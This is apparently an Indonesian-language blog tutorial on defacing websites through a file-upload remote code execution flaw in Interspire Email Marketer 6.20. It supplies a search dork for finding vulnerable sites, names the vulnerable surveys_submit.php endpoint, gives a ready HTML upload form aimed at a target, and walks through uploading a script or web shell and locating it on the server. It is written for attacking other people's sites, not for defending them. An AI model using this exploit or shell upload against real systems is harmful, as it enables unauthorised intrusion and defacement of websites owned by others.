Deface Poc Interspire Email Marketer 6.20 RCE

Assalamualaikum Wr Wb.

Kembali Lagi Bersama Gua Asano Yang Tergans Gans Didunia Ea :v
Oke, Dalam Kesempatan Kali Ini Gua Akan, Kasih Tutorial Seperti Judul Diatas.
Bagi Yang Penasaran Langsung Saja Simak Baik-Baik.
 

Dork :
inurl:/admin/temp/surveys/

Exploit :
/admin/temp/surveys/

Titik Vuln :
surveys_submit.php


 1. Copy Semua Script Di Bawah Ini, Save Dengan Ektensi .html Nanti Akan Kita Jadikan CSRF.

<!DOCTYPE HTML>

<html lang="en-US">

<head>

<meta charset="UTF-8">

<title>RCE</title>

</head>

<body>

<form action="http://target.com/surveys_submit.php?formId=1" method="post" enctype="multipart/form-data">

<input type="file" name="widget[0][field][][value]">

<input type="submit" value="submit" name="submit">

</form>

</body>

</html>

2. Cari Di Index Of, File surveys_submit.php Kalau Ada Berarti Site Nya Vuln Belum Tentu Juga Lur :v

3. Sekarang Kita Tambahin Exploit Nya Untuk Menglihat DIR

Nah Disini Gua Memilih DIR Nomor "1" Untuk Di Eue Biar Enak :v Ehhh Maksudnya Biar Sc Kita Ke Upload.

4. Lansung Buka Aplikasi Codingan Lu, Copy Link Yang Ada Titik Vuln

Selanjutnya Gua Mau Upload Sc Di Dir Nomor "1".

Lalu Lu Save Yekan.

5. Buka CSRF Yang Lu Save Tadi, Disini Gua Akan Upload Script,
Kalo Mau Upload Shell ? Begimana, Use Your Brian ! Soalnya Gua Gak Bisa :v

Jika Sudah Memilih Sc Yang Cocok Langsung Aja "SUBMIT"

6. Cara Aksesnya Kaya Mana Lur, Kita Kembali Ke Nomor 3
Buka Dir Nomor "1"

Nah File Yang Kalian Upload Ada Dir Paling Bawah Contoh Punya Gua "595"

Tinggal Touch Aja Tuh Filenya

Oke Cukup Sekian Dari Gua Asano, Bila Ada Salah Kata Maklum Namanya Manusia Bye Bye.

Loading...

Share this post